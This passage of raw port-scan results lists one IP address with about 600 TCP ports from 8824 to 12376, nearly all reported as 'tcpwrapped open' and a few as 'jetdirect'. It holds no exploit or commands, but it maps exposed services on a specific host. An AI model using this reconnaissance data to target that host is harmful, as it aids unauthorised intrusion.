8214149.126.72.220 8824 tcp tcpwrapped open
8215149.126.72.220 8825 tcp tcpwrapped open
8216149.126.72.220 8826 tcp tcpwrapped open
8217149.126.72.220 8827 tcp tcpwrapped open
8218149.126.72.220 8828 tcp tcpwrapped open
8219149.126.72.220 8829 tcp tcpwrapped open
8220149.126.72.220 8830 tcp tcpwrapped open
8221149.126.72.220 8831 tcp tcpwrapped open
8222149.126.72.220 8832 tcp tcpwrapped open
8223149.126.72.220 8833 tcp tcpwrapped open
8224149.126.72.220 8834 tcp tcpwrapped open
8225149.126.72.220 8835 tcp tcpwrapped open
8226149.126.72.220 8836 tcp tcpwrapped open
8227149.126.72.220 8837 tcp tcpwrapped open
8228149.126.72.220 8838 tcp tcpwrapped open
8229149.126.72.220 8839 tcp tcpwrapped open
8230149.126.72.220 8840 tcp tcpwrapped open
8231149.126.72.220 8841 tcp tcpwrapped open
8232149.126.72.220 8842 tcp tcpwrapped open
8233149.126.72.220 8843 tcp tcpwrapped open
8234149.126.72.220 8844 tcp tcpwrapped open
8235149.126.72.220 8845 tcp tcpwrapped open
8236149.126.72.220 8846 tcp tcpwrapped open
8237149.126.72.220 8847 tcp tcpwrapped open
8238149.126.72.220 8848 tcp tcpwrapped open
8239149.126.72.220 8849 tcp tcpwrapped open
8240149.126.72.220 8850 tcp tcpwrapped open
8241149.126.72.220 8851 tcp tcpwrapped open
8242149.126.72.220 8852 tcp tcpwrapped open
8243149.126.72.220 8853 tcp tcpwrapped open
8244149.126.72.220 8854 tcp tcpwrapped open
8245149.126.72.220 8855 tcp tcpwrapped open
8246149.126.72.220 8856 tcp tcpwrapped open
8247149.126.72.220 8857 tcp tcpwrapped open
8248149.126.72.220 8858 tcp tcpwrapped open
8249149.126.72.220 8859 tcp tcpwrapped open
8250149.126.72.220 8860 tcp tcpwrapped open
8251149.126.72.220 8861 tcp tcpwrapped open
8252149.126.72.220 8862 tcp tcpwrapped open
8253149.126.72.220 8863 tcp tcpwrapped open
8254149.126.72.220 8864 tcp tcpwrapped open
8255149.126.72.220 8865 tcp tcpwrapped open
8256149.126.72.220 8866 tcp tcpwrapped open
8257149.126.72.220 8867 tcp tcpwrapped open
8258149.126.72.220 8868 tcp tcpwrapped open
8259149.126.72.220 8869 tcp tcpwrapped open
8260149.126.72.220 8870 tcp tcpwrapped open
8261149.126.72.220 8871 tcp tcpwrapped open
8262149.126.72.220 8872 tcp tcpwrapped open
8263149.126.72.220 8873 tcp tcpwrapped open
8264149.126.72.220 8874 tcp tcpwrapped open
8265149.126.72.220 8875 tcp tcpwrapped open
8266149.126.72.220 8876 tcp tcpwrapped open
8267149.126.72.220 8877 tcp tcpwrapped open
8268149.126.72.220 8878 tcp tcpwrapped open
8269149.126.72.220 8879 tcp tcpwrapped open
8270149.126.72.220 8880 tcp tcpwrapped open
8271149.126.72.220 8881 tcp tcpwrapped open
8272149.126.72.220 8882 tcp tcpwrapped open
8273149.126.72.220 8883 tcp tcpwrapped open
8274149.126.72.220 8884 tcp tcpwrapped open
8275149.126.72.220 8885 tcp tcpwrapped open
8276149.126.72.220 8887 tcp tcpwrapped open
8277149.126.72.220 8888 tcp tcpwrapped open
8278149.126.72.220 8889 tcp tcpwrapped open
8279149.126.72.220 8890 tcp tcpwrapped open
8280149.126.72.220 8891 tcp tcpwrapped open
8281149.126.72.220 8899 tcp tcpwrapped open
8282149.126.72.220 8900 tcp tcpwrapped open
8283149.126.72.220 8901 tcp tcpwrapped open
8284149.126.72.220 8902 tcp tcpwrapped open
8285149.126.72.220 8905 tcp tcpwrapped open
8286149.126.72.220 8906 tcp tcpwrapped open
8287149.126.72.220 8907 tcp tcpwrapped open
8288149.126.72.220 8908 tcp tcpwrapped open
8289149.126.72.220 8910 tcp tcpwrapped open
8290149.126.72.220 8911 tcp tcpwrapped open
8291149.126.72.220 8912 tcp tcpwrapped open
8292149.126.72.220 8913 tcp tcpwrapped open
8293149.126.72.220 8915 tcp tcpwrapped open
8294149.126.72.220 8916 tcp tcpwrapped open
8295149.126.72.220 8935 tcp tcpwrapped open
8296149.126.72.220 8943 tcp tcpwrapped open
8297149.126.72.220 8969 tcp tcpwrapped open
8298149.126.72.220 8988 tcp tcpwrapped open
8299149.126.72.220 8989 tcp tcpwrapped open
8300149.126.72.220 8999 tcp tcpwrapped open
8301149.126.72.220 9000 tcp tcpwrapped open
8302149.126.72.220 9001 tcp tcpwrapped open
8303149.126.72.220 9002 tcp tcpwrapped open
8304149.126.72.220 9003 tcp tcpwrapped open
8305149.126.72.220 9004 tcp tcpwrapped open
8306149.126.72.220 9005 tcp tcpwrapped open
8307149.126.72.220 9006 tcp tcpwrapped open
8308149.126.72.220 9007 tcp tcpwrapped open
8309149.126.72.220 9008 tcp tcpwrapped open
8310149.126.72.220 9009 tcp tcpwrapped open
8311149.126.72.220 9010 tcp tcpwrapped open
8312149.126.72.220 9011 tcp tcpwrapped open
8313149.126.72.220 9012 tcp tcpwrapped open
8314149.126.72.220 9013 tcp tcpwrapped open
8315149.126.72.220 9014 tcp tcpwrapped open
8316149.126.72.220 9015 tcp tcpwrapped open
8317149.126.72.220 9016 tcp tcpwrapped open
8318149.126.72.220 9017 tcp tcpwrapped open
8319149.126.72.220 9018 tcp tcpwrapped open
8320149.126.72.220 9019 tcp tcpwrapped open
8321149.126.72.220 9020 tcp tcpwrapped open
8322149.126.72.220 9021 tcp tcpwrapped open
8323149.126.72.220 9022 tcp tcpwrapped open
8324149.126.72.220 9023 tcp tcpwrapped open
8325149.126.72.220 9024 tcp tcpwrapped open
8326149.126.72.220 9025 tcp tcpwrapped open
8327149.126.72.220 9026 tcp tcpwrapped open
8328149.126.72.220 9027 tcp tcpwrapped open
8329149.126.72.220 9028 tcp tcpwrapped open
8330149.126.72.220 9029 tcp tcpwrapped open
8331149.126.72.220 9030 tcp tcpwrapped open
8332149.126.72.220 9031 tcp tcpwrapped open
8333149.126.72.220 9032 tcp tcpwrapped open
8334149.126.72.220 9033 tcp tcpwrapped open
8335149.126.72.220 9034 tcp tcpwrapped open
8336149.126.72.220 9035 tcp tcpwrapped open
8337149.126.72.220 9036 tcp tcpwrapped open
8338149.126.72.220 9037 tcp tcpwrapped open
8339149.126.72.220 9038 tcp tcpwrapped open
8340149.126.72.220 9039 tcp tcpwrapped open
8341149.126.72.220 9040 tcp tcpwrapped open
8342149.126.72.220 9041 tcp tcpwrapped open
8343149.126.72.220 9042 tcp tcpwrapped open
8344149.126.72.220 9043 tcp tcpwrapped open
8345149.126.72.220 9044 tcp tcpwrapped open
8346149.126.72.220 9045 tcp tcpwrapped open
8347149.126.72.220 9046 tcp tcpwrapped open
8348149.126.72.220 9047 tcp tcpwrapped open
8349149.126.72.220 9048 tcp tcpwrapped open
8350149.126.72.220 9049 tcp tcpwrapped open
8351149.126.72.220 9050 tcp tcpwrapped open
8352149.126.72.220 9051 tcp tcpwrapped open
8353149.126.72.220 9052 tcp tcpwrapped open
8354149.126.72.220 9058 tcp tcpwrapped open
8355149.126.72.220 9060 tcp tcpwrapped open
8356149.126.72.220 9061 tcp tcpwrapped open
8357149.126.72.220 9070 tcp tcpwrapped open
8358149.126.72.220 9080 tcp tcpwrapped open
8359149.126.72.220 9081 tcp tcpwrapped open
8360149.126.72.220 9082 tcp tcpwrapped open
8361149.126.72.220 9084 tcp tcpwrapped open
8362149.126.72.220 9085 tcp tcpwrapped open
8363149.126.72.220 9086 tcp tcpwrapped open
8364149.126.72.220 9088 tcp tcpwrapped open
8365149.126.72.220 9089 tcp tcpwrapped open
8366149.126.72.220 9090 tcp tcpwrapped open
8367149.126.72.220 9091 tcp tcpwrapped open
8368149.126.72.220 9092 tcp tcpwrapped open
8369149.126.72.220 9093 tcp tcpwrapped open
8370149.126.72.220 9094 tcp tcpwrapped open
8371149.126.72.220 9095 tcp tcpwrapped open
8372149.126.72.220 9096 tcp tcpwrapped open
8373149.126.72.220 9097 tcp tcpwrapped open
8374149.126.72.220 9098 tcp tcpwrapped open
8375149.126.72.220 9099 tcp tcpwrapped open
8376149.126.72.220 9100 tcp jetdirect open
8377149.126.72.220 9101 tcp jetdirect open
8378149.126.72.220 9102 tcp jetdirect open
8379149.126.72.220 9103 tcp jetdirect open
8380149.126.72.220 9104 tcp jetdirect open
8381149.126.72.220 9105 tcp jetdirect open
8382149.126.72.220 9106 tcp jetdirect open
8383149.126.72.220 9107 tcp jetdirect open
8384149.126.72.220 9108 tcp tcpwrapped open
8385149.126.72.220 9109 tcp tcpwrapped open
8386149.126.72.220 9110 tcp tcpwrapped open
8387149.126.72.220 9111 tcp tcpwrapped open
8388149.126.72.220 9136 tcp tcpwrapped open
8389149.126.72.220 9143 tcp tcpwrapped open
8390149.126.72.220 9189 tcp tcpwrapped open
8391149.126.72.220 9199 tcp tcpwrapped open
8392149.126.72.220 9200 tcp tcpwrapped open
8393149.126.72.220 9201 tcp tcpwrapped open
8394149.126.72.220 9202 tcp tcpwrapped open
8395149.126.72.220 9203 tcp tcpwrapped open
8396149.126.72.220 9204 tcp tcpwrapped open
8397149.126.72.220 9205 tcp tcpwrapped open
8398149.126.72.220 9206 tcp tcpwrapped open
8399149.126.72.220 9207 tcp tcpwrapped open
8400149.126.72.220 9208 tcp tcpwrapped open
8401149.126.72.220 9209 tcp tcpwrapped open
8402149.126.72.220 9210 tcp tcpwrapped open
8403149.126.72.220 9211 tcp tcpwrapped open
8404149.126.72.220 9212 tcp tcpwrapped open
8405149.126.72.220 9213 tcp tcpwrapped open
8406149.126.72.220 9214 tcp tcpwrapped open
8407149.126.72.220 9215 tcp tcpwrapped open
8408149.126.72.220 9216 tcp tcpwrapped open
8409149.126.72.220 9217 tcp tcpwrapped open
8410149.126.72.220 9218 tcp tcpwrapped open
8411149.126.72.220 9219 tcp tcpwrapped open
8412149.126.72.220 9220 tcp tcpwrapped open
8413149.126.72.220 9221 tcp tcpwrapped open
8414149.126.72.220 9236 tcp tcpwrapped open
8415149.126.72.220 9251 tcp tcpwrapped open
8416149.126.72.220 9289 tcp tcpwrapped open
8417149.126.72.220 9299 tcp tcpwrapped open
8418149.126.72.220 9300 tcp tcpwrapped open
8419149.126.72.220 9301 tcp tcpwrapped open
8420149.126.72.220 9302 tcp tcpwrapped open
8421149.126.72.220 9303 tcp tcpwrapped open
8422149.126.72.220 9304 tcp tcpwrapped open
8423149.126.72.220 9305 tcp tcpwrapped open
8424149.126.72.220 9306 tcp tcpwrapped open
8425149.126.72.220 9307 tcp tcpwrapped open
8426149.126.72.220 9308 tcp tcpwrapped open
8427149.126.72.220 9309 tcp tcpwrapped open
8428149.126.72.220 9310 tcp tcpwrapped open
8429149.126.72.220 9311 tcp tcpwrapped open
8430149.126.72.220 9350 tcp tcpwrapped open
8431149.126.72.220 9383 tcp tcpwrapped open
8432149.126.72.220 9387 tcp tcpwrapped open
8433149.126.72.220 9389 tcp tcpwrapped open
8434149.126.72.220 9433 tcp tcpwrapped open
8435149.126.72.220 9443 tcp tcpwrapped open
8436149.126.72.220 9444 tcp tcpwrapped open
8437149.126.72.220 9446 tcp tcpwrapped open
8438149.126.72.220 9447 tcp tcpwrapped open
8439149.126.72.220 9500 tcp tcpwrapped open
8440149.126.72.220 9510 tcp tcpwrapped open
8441149.126.72.220 9530 tcp tcpwrapped open
8442149.126.72.220 9550 tcp tcpwrapped open
8443149.126.72.220 9600 tcp tcpwrapped open
8444149.126.72.220 9663 tcp tcpwrapped open
8445149.126.72.220 9690 tcp tcpwrapped open
8446149.126.72.220 9704 tcp tcpwrapped open
8447149.126.72.220 9710 tcp tcpwrapped open
8448149.126.72.220 9711 tcp tcpwrapped open
8449149.126.72.220 9765 tcp tcpwrapped open
8450149.126.72.220 9773 tcp tcpwrapped open
8451149.126.72.220 9779 tcp tcpwrapped open
8452149.126.72.220 9800 tcp tcpwrapped open
8453149.126.72.220 9803 tcp tcpwrapped open
8454149.126.72.220 9804 tcp tcpwrapped open
8455149.126.72.220 9950 tcp tcpwrapped open
8456149.126.72.220 9991 tcp tcpwrapped open
8457149.126.72.220 9992 tcp tcpwrapped open
8458149.126.72.220 9993 tcp tcpwrapped open
8459149.126.72.220 9994 tcp tcpwrapped open
8460149.126.72.220 9997 tcp tcpwrapped open
8461149.126.72.220 9998 tcp tcpwrapped open
8462149.126.72.220 9999 tcp tcpwrapped open
8463149.126.72.220 10000 tcp tcpwrapped open
8464149.126.72.220 10001 tcp tcpwrapped open
8465149.126.72.220 10002 tcp tcpwrapped open
8466149.126.72.220 10003 tcp tcpwrapped open
8467149.126.72.220 10004 tcp tcpwrapped open
8468149.126.72.220 10005 tcp tcpwrapped open
8469149.126.72.220 10006 tcp tcpwrapped open
8470149.126.72.220 10007 tcp tcpwrapped open
8471149.126.72.220 10008 tcp tcpwrapped open
8472149.126.72.220 10009 tcp tcpwrapped open
8473149.126.72.220 10010 tcp tcpwrapped open
8474149.126.72.220 10011 tcp tcpwrapped open
8475149.126.72.220 10012 tcp tcpwrapped open
8476149.126.72.220 10013 tcp tcpwrapped open
8477149.126.72.220 10014 tcp tcpwrapped open
8478149.126.72.220 10015 tcp tcpwrapped open
8479149.126.72.220 10016 tcp tcpwrapped open
8480149.126.72.220 10017 tcp tcpwrapped open
8481149.126.72.220 10018 tcp tcpwrapped open
8482149.126.72.220 10019 tcp tcpwrapped open
8483149.126.72.220 10020 tcp tcpwrapped open
8484149.126.72.220 10021 tcp tcpwrapped open
8485149.126.72.220 10022 tcp tcpwrapped open
8486149.126.72.220 10023 tcp tcpwrapped open
8487149.126.72.220 10024 tcp tcpwrapped open
8488149.126.72.220 10025 tcp tcpwrapped open
8489149.126.72.220 10026 tcp tcpwrapped open
8490149.126.72.220 10027 tcp tcpwrapped open
8491149.126.72.220 10028 tcp tcpwrapped open
8492149.126.72.220 10029 tcp tcpwrapped open
8493149.126.72.220 10030 tcp tcpwrapped open
8494149.126.72.220 10031 tcp tcpwrapped open
8495149.126.72.220 10032 tcp tcpwrapped open
8496149.126.72.220 10033 tcp tcpwrapped open
8497149.126.72.220 10034 tcp tcpwrapped open
8498149.126.72.220 10035 tcp tcpwrapped open
8499149.126.72.220 10036 tcp tcpwrapped open
8500149.126.72.220 10037 tcp tcpwrapped open
8501149.126.72.220 10038 tcp tcpwrapped open
8502149.126.72.220 10039 tcp tcpwrapped open
8503149.126.72.220 10040 tcp tcpwrapped open
8504149.126.72.220 10041 tcp tcpwrapped open
8505149.126.72.220 10042 tcp tcpwrapped open
8506149.126.72.220 10043 tcp tcpwrapped open
8507149.126.72.220 10044 tcp tcpwrapped open
8508149.126.72.220 10045 tcp tcpwrapped open
8509149.126.72.220 10046 tcp tcpwrapped open
8510149.126.72.220 10047 tcp tcpwrapped open
8511149.126.72.220 10048 tcp tcpwrapped open
8512149.126.72.220 10049 tcp tcpwrapped open
8513149.126.72.220 10065 tcp tcpwrapped open
8514149.126.72.220 10071 tcp tcpwrapped open
8515149.126.72.220 10075 tcp tcpwrapped open
8516149.126.72.220 10082 tcp tcpwrapped open
8517149.126.72.220 10084 tcp tcpwrapped open
8518149.126.72.220 10100 tcp tcpwrapped open
8519149.126.72.220 10123 tcp tcpwrapped open
8520149.126.72.220 10200 tcp tcpwrapped open
8521149.126.72.220 10443 tcp tcpwrapped open
8522149.126.72.220 10444 tcp tcpwrapped open
8523149.126.72.220 10892 tcp tcpwrapped open
8524149.126.72.220 10894 tcp tcpwrapped open
8525149.126.72.220 11001 tcp tcpwrapped open
8526149.126.72.220 11002 tcp tcpwrapped open
8527149.126.72.220 11007 tcp tcpwrapped open
8528149.126.72.220 11027 tcp tcpwrapped open
8529149.126.72.220 11065 tcp tcpwrapped open
8530149.126.72.220 11075 tcp tcpwrapped open
8531149.126.72.220 11082 tcp tcpwrapped open
8532149.126.72.220 11084 tcp tcpwrapped open
8533149.126.72.220 11110 tcp tcpwrapped open
8534149.126.72.220 11182 tcp tcpwrapped open
8535149.126.72.220 11184 tcp tcpwrapped open
8536149.126.72.220 11443 tcp tcpwrapped open
8537149.126.72.220 12016 tcp tcpwrapped open
8538149.126.72.220 12082 tcp tcpwrapped open
8539149.126.72.220 12084 tcp tcpwrapped open
8540149.126.72.220 12103 tcp tcpwrapped open
8541149.126.72.220 12104 tcp tcpwrapped open
8542149.126.72.220 12105 tcp tcpwrapped open
8543149.126.72.220 12106 tcp tcpwrapped open
8544149.126.72.220 12107 tcp tcpwrapped open
8545149.126.72.220 12108 tcp tcpwrapped open
8546149.126.72.220 12109 tcp tcpwrapped open
8547149.126.72.220 12110 tcp tcpwrapped open
8548149.126.72.220 12111 tcp tcpwrapped open
8549149.126.72.220 12112 tcp tcpwrapped open
8550149.126.72.220 12113 tcp tcpwrapped open
8551149.126.72.220 12114 tcp tcpwrapped open
8552149.126.72.220 12115 tcp tcpwrapped open
8553149.126.72.220 12116 tcp tcpwrapped open
8554149.126.72.220 12117 tcp tcpwrapped open
8555149.126.72.220 12118 tcp tcpwrapped open
8556149.126.72.220 12119 tcp tcpwrapped open
8557149.126.72.220 12120 tcp tcpwrapped open
8558149.126.72.220 12121 tcp tcpwrapped open
8559149.126.72.220 12122 tcp tcpwrapped open
8560149.126.72.220 12123 tcp tcpwrapped open
8561149.126.72.220 12124 tcp tcpwrapped open
8562149.126.72.220 12125 tcp tcpwrapped open
8563149.126.72.220 12126 tcp tcpwrapped open
8564149.126.72.220 12127 tcp tcpwrapped open
8565149.126.72.220 12128 tcp tcpwrapped open
8566149.126.72.220 12129 tcp tcpwrapped open
8567149.126.72.220 12130 tcp tcpwrapped open
8568149.126.72.220 12131 tcp tcpwrapped open
8569149.126.72.220 12132 tcp tcpwrapped open
8570149.126.72.220 12133 tcp tcpwrapped open
8571149.126.72.220 12134 tcp tcpwrapped open
8572149.126.72.220 12135 tcp tcpwrapped open
8573149.126.72.220 12136 tcp tcpwrapped open
8574149.126.72.220 12137 tcp tcpwrapped open
8575149.126.72.220 12138 tcp tcpwrapped open
8576149.126.72.220 12139 tcp tcpwrapped open
8577149.126.72.220 12140 tcp tcpwrapped open
8578149.126.72.220 12141 tcp tcpwrapped open
8579149.126.72.220 12142 tcp tcpwrapped open
8580149.126.72.220 12143 tcp tcpwrapped open
8581149.126.72.220 12144 tcp tcpwrapped open
8582149.126.72.220 12145 tcp tcpwrapped open
8583149.126.72.220 12146 tcp tcpwrapped open
8584149.126.72.220 12147 tcp tcpwrapped open
8585149.126.72.220 12148 tcp tcpwrapped open
8586149.126.72.220 12149 tcp tcpwrapped open
8587149.126.72.220 12150 tcp tcpwrapped open
8588149.126.72.220 12151 tcp tcpwrapped open
8589149.126.72.220 12152 tcp tcpwrapped open
8590149.126.72.220 12153 tcp tcpwrapped open
8591149.126.72.220 12154 tcp tcpwrapped open
8592149.126.72.220 12155 tcp tcpwrapped open
8593149.126.72.220 12156 tcp tcpwrapped open
8594149.126.72.220 12157 tcp tcpwrapped open
8595149.126.72.220 12158 tcp tcpwrapped open
8596149.126.72.220 12159 tcp tcpwrapped open
8597149.126.72.220 12160 tcp tcpwrapped open
8598149.126.72.220 12161 tcp tcpwrapped open
8599149.126.72.220 12162 tcp tcpwrapped open
8600149.126.72.220 12163 tcp tcpwrapped open
8601149.126.72.220 12164 tcp tcpwrapped open
8602149.126.72.220 12165 tcp tcpwrapped open
8603149.126.72.220 12166 tcp tcpwrapped open
8604149.126.72.220 12167 tcp tcpwrapped open
8605149.126.72.220 12168 tcp tcpwrapped open
8606149.126.72.220 12169 tcp tcpwrapped open
8607149.126.72.220 12170 tcp tcpwrapped open
8608149.126.72.220 12171 tcp tcpwrapped open
8609149.126.72.220 12172 tcp tcpwrapped open
8610149.126.72.220 12173 tcp tcpwrapped open
8611149.126.72.220 12174 tcp tcpwrapped open
8612149.126.72.220 12175 tcp tcpwrapped open
8613149.126.72.220 12176 tcp tcpwrapped open
8614149.126.72.220 12177 tcp tcpwrapped open
8615149.126.72.220 12178 tcp tcpwrapped open
8616149.126.72.220 12179 tcp tcpwrapped open
8617149.126.72.220 12180 tcp tcpwrapped open
8618149.126.72.220 12181 tcp tcpwrapped open
8619149.126.72.220 12182 tcp tcpwrapped open
8620149.126.72.220 12183 tcp tcpwrapped open
8621149.126.72.220 12184 tcp tcpwrapped open
8622149.126.72.220 12185 tcp tcpwrapped open
8623149.126.72.220 12186 tcp tcpwrapped open
8624149.126.72.220 12187 tcp tcpwrapped open
8625149.126.72.220 12188 tcp tcpwrapped open
8626149.126.72.220 12189 tcp tcpwrapped open
8627149.126.72.220 12190 tcp tcpwrapped open
8628149.126.72.220 12191 tcp tcpwrapped open
8629149.126.72.220 12192 tcp tcpwrapped open
8630149.126.72.220 12193 tcp tcpwrapped open
8631149.126.72.220 12194 tcp tcpwrapped open
8632149.126.72.220 12195 tcp tcpwrapped open
8633149.126.72.220 12196 tcp tcpwrapped open
8634149.126.72.220 12197 tcp tcpwrapped open
8635149.126.72.220 12198 tcp tcpwrapped open
8636149.126.72.220 12199 tcp tcpwrapped open
8637149.126.72.220 12200 tcp tcpwrapped open
8638149.126.72.220 12201 tcp tcpwrapped open
8639149.126.72.220 12202 tcp tcpwrapped open
8640149.126.72.220 12203 tcp tcpwrapped open
8641149.126.72.220 12204 tcp tcpwrapped open
8642149.126.72.220 12205 tcp tcpwrapped open
8643149.126.72.220 12206 tcp tcpwrapped open
8644149.126.72.220 12207 tcp tcpwrapped open
8645149.126.72.220 12208 tcp tcpwrapped open
8646149.126.72.220 12209 tcp tcpwrapped open
8647149.126.72.220 12210 tcp tcpwrapped open
8648149.126.72.220 12211 tcp tcpwrapped open
8649149.126.72.220 12212 tcp tcpwrapped open
8650149.126.72.220 12213 tcp tcpwrapped open
8651149.126.72.220 12214 tcp tcpwrapped open
8652149.126.72.220 12215 tcp tcpwrapped open
8653149.126.72.220 12216 tcp tcpwrapped open
8654149.126.72.220 12217 tcp tcpwrapped open
8655149.126.72.220 12218 tcp tcpwrapped open
8656149.126.72.220 12219 tcp tcpwrapped open
8657149.126.72.220 12220 tcp tcpwrapped open
8658149.126.72.220 12221 tcp tcpwrapped open
8659149.126.72.220 12222 tcp tcpwrapped open
8660149.126.72.220 12223 tcp tcpwrapped open
8661149.126.72.220 12224 tcp tcpwrapped open
8662149.126.72.220 12225 tcp tcpwrapped open
8663149.126.72.220 12226 tcp tcpwrapped open
8664149.126.72.220 12227 tcp tcpwrapped open
8665149.126.72.220 12228 tcp tcpwrapped open
8666149.126.72.220 12229 tcp tcpwrapped open
8667149.126.72.220 12230 tcp tcpwrapped open
8668149.126.72.220 12231 tcp tcpwrapped open
8669149.126.72.220 12232 tcp tcpwrapped open
8670149.126.72.220 12233 tcp tcpwrapped open
8671149.126.72.220 12234 tcp tcpwrapped open
8672149.126.72.220 12235 tcp tcpwrapped open
8673149.126.72.220 12236 tcp tcpwrapped open
8674149.126.72.220 12237 tcp tcpwrapped open
8675149.126.72.220 12238 tcp tcpwrapped open
8676149.126.72.220 12239 tcp tcpwrapped open
8677149.126.72.220 12240 tcp tcpwrapped open
8678149.126.72.220 12241 tcp tcpwrapped open
8679149.126.72.220 12242 tcp tcpwrapped open
8680149.126.72.220 12243 tcp tcpwrapped open
8681149.126.72.220 12244 tcp tcpwrapped open
8682149.126.72.220 12245 tcp tcpwrapped open
8683149.126.72.220 12246 tcp tcpwrapped open
8684149.126.72.220 12247 tcp tcpwrapped open
8685149.126.72.220 12248 tcp tcpwrapped open
8686149.126.72.220 12249 tcp tcpwrapped open
8687149.126.72.220 12250 tcp tcpwrapped open
8688149.126.72.220 12251 tcp tcpwrapped open
8689149.126.72.220 12252 tcp tcpwrapped open
8690149.126.72.220 12253 tcp tcpwrapped open
8691149.126.72.220 12254 tcp tcpwrapped open
8692149.126.72.220 12255 tcp tcpwrapped open
8693149.126.72.220 12256 tcp tcpwrapped open
8694149.126.72.220 12257 tcp tcpwrapped open
8695149.126.72.220 12258 tcp tcpwrapped open
8696149.126.72.220 12259 tcp tcpwrapped open
8697149.126.72.220 12260 tcp tcpwrapped open
8698149.126.72.220 12261 tcp tcpwrapped open
8699149.126.72.220 12262 tcp tcpwrapped open
8700149.126.72.220 12263 tcp tcpwrapped open
8701149.126.72.220 12264 tcp tcpwrapped open
8702149.126.72.220 12265 tcp tcpwrapped open
8703149.126.72.220 12266 tcp tcpwrapped open
8704149.126.72.220 12267 tcp tcpwrapped open
8705149.126.72.220 12268 tcp tcpwrapped open
8706149.126.72.220 12269 tcp tcpwrapped open
8707149.126.72.220 12270 tcp tcpwrapped open
8708149.126.72.220 12271 tcp tcpwrapped open
8709149.126.72.220 12272 tcp tcpwrapped open
8710149.126.72.220 12273 tcp tcpwrapped open
8711149.126.72.220 12274 tcp tcpwrapped open
8712149.126.72.220 12275 tcp tcpwrapped open
8713149.126.72.220 12276 tcp tcpwrapped open
8714149.126.72.220 12277 tcp tcpwrapped open
8715149.126.72.220 12278 tcp tcpwrapped open
8716149.126.72.220 12279 tcp tcpwrapped open
8717149.126.72.220 12280 tcp tcpwrapped open
8718149.126.72.220 12281 tcp tcpwrapped open
8719149.126.72.220 12282 tcp tcpwrapped open
8720149.126.72.220 12283 tcp tcpwrapped open
8721149.126.72.220 12284 tcp tcpwrapped open
8722149.126.72.220 12285 tcp tcpwrapped open
8723149.126.72.220 12286 tcp tcpwrapped open
8724149.126.72.220 12287 tcp tcpwrapped open
8725149.126.72.220 12288 tcp tcpwrapped open
8726149.126.72.220 12289 tcp tcpwrapped open
8727149.126.72.220 12290 tcp tcpwrapped open
8728149.126.72.220 12291 tcp tcpwrapped open
8729149.126.72.220 12292 tcp tcpwrapped open
8730149.126.72.220 12293 tcp tcpwrapped open
8731149.126.72.220 12294 tcp tcpwrapped open
8732149.126.72.220 12295 tcp tcpwrapped open
8733149.126.72.220 12296 tcp tcpwrapped open
8734149.126.72.220 12297 tcp tcpwrapped open
8735149.126.72.220 12298 tcp tcpwrapped open
8736149.126.72.220 12299 tcp tcpwrapped open
8737149.126.72.220 12300 tcp tcpwrapped open
8738149.126.72.220 12301 tcp tcpwrapped open
8739149.126.72.220 12302 tcp tcpwrapped open
8740149.126.72.220 12303 tcp tcpwrapped open
8741149.126.72.220 12304 tcp tcpwrapped open
8742149.126.72.220 12305 tcp tcpwrapped open
8743149.126.72.220 12306 tcp tcpwrapped open
8744149.126.72.220 12307 tcp tcpwrapped open
8745149.126.72.220 12308 tcp tcpwrapped open
8746149.126.72.220 12309 tcp tcpwrapped open
8747149.126.72.220 12310 tcp tcpwrapped open
8748149.126.72.220 12311 tcp tcpwrapped open
8749149.126.72.220 12312 tcp tcpwrapped open
8750149.126.72.220 12313 tcp tcpwrapped open
8751149.126.72.220 12314 tcp tcpwrapped open
8752149.126.72.220 12315 tcp tcpwrapped open
8753149.126.72.220 12316 tcp tcpwrapped open
8754149.126.72.220 12317 tcp tcpwrapped open
8755149.126.72.220 12318 tcp tcpwrapped open
8756149.126.72.220 12319 tcp tcpwrapped open
8757149.126.72.220 12320 tcp tcpwrapped open
8758149.126.72.220 12321 tcp tcpwrapped open
8759149.126.72.220 12322 tcp tcpwrapped open
8760149.126.72.220 12323 tcp tcpwrapped open
8761149.126.72.220 12324 tcp tcpwrapped open
8762149.126.72.220 12325 tcp tcpwrapped open
8763149.126.72.220 12326 tcp tcpwrapped open
8764149.126.72.220 12327 tcp tcpwrapped open
8765149.126.72.220 12328 tcp tcpwrapped open
8766149.126.72.220 12329 tcp tcpwrapped open
8767149.126.72.220 12330 tcp tcpwrapped open
8768149.126.72.220 12331 tcp tcpwrapped open
8769149.126.72.220 12332 tcp tcpwrapped open
8770149.126.72.220 12333 tcp tcpwrapped open
8771149.126.72.220 12334 tcp tcpwrapped open
8772149.126.72.220 12335 tcp tcpwrapped open
8773149.126.72.220 12336 tcp tcpwrapped open
8774149.126.72.220 12337 tcp tcpwrapped open
8775149.126.72.220 12338 tcp tcpwrapped open
8776149.126.72.220 12339 tcp tcpwrapped open
8777149.126.72.220 12340 tcp tcpwrapped open
8778149.126.72.220 12341 tcp tcpwrapped open
8779149.126.72.220 12342 tcp tcpwrapped open
8780149.126.72.220 12343 tcp tcpwrapped open
8781149.126.72.220 12344 tcp tcpwrapped open
8782149.126.72.220 12345 tcp tcpwrapped open
8783149.126.72.220 12346 tcp tcpwrapped open
8784149.126.72.220 12347 tcp tcpwrapped open
8785149.126.72.220 12348 tcp tcpwrapped open
8786149.126.72.220 12349 tcp tcpwrapped open
8787149.126.72.220 12350 tcp tcpwrapped open
8788149.126.72.220 12351 tcp tcpwrapped open
8789149.126.72.220 12352 tcp tcpwrapped open
8790149.126.72.220 12353 tcp tcpwrapped open
8791149.126.72.220 12354 tcp tcpwrapped open
8792149.126.72.220 12355 tcp tcpwrapped open
8793149.126.72.220 12356 tcp tcpwrapped open
8794149.126.72.220 12357 tcp tcpwrapped open
8795149.126.72.220 12358 tcp tcpwrapped open
8796149.126.72.220 12359 tcp tcpwrapped open
8797149.126.72.220 12360 tcp tcpwrapped open
8798149.126.72.220 12361 tcp tcpwrapped open
8799149.126.72.220 12362 tcp tcpwrapped open
8800149.126.72.220 12363 tcp tcpwrapped open
8801149.126.72.220 12364 tcp tcpwrapped open
8802149.126.72.220 12365 tcp tcpwrapped open
8803149.126.72.220 12366 tcp tcpwrapped open
8804149.126.72.220 12367 tcp tcpwrapped open
8805149.126.72.220 12368 tcp tcpwrapped open
8806149.126.72.220 12369 tcp tcpwrapped open
8807149.126.72.220 12370 tcp tcpwrapped open
8808149.126.72.220 12371 tcp tcpwrapped open
8809149.126.72.220 12372 tcp tcpwrapped open
8810149.126.72.220 12373 tcp tcpwrapped open
8811149.126.72.220 12374 tcp tcpwrapped open
8812149.126.72.220 12375 tcp tcpwrapped open
8813149.126.72.220 12376 tcp tcpwrapped open
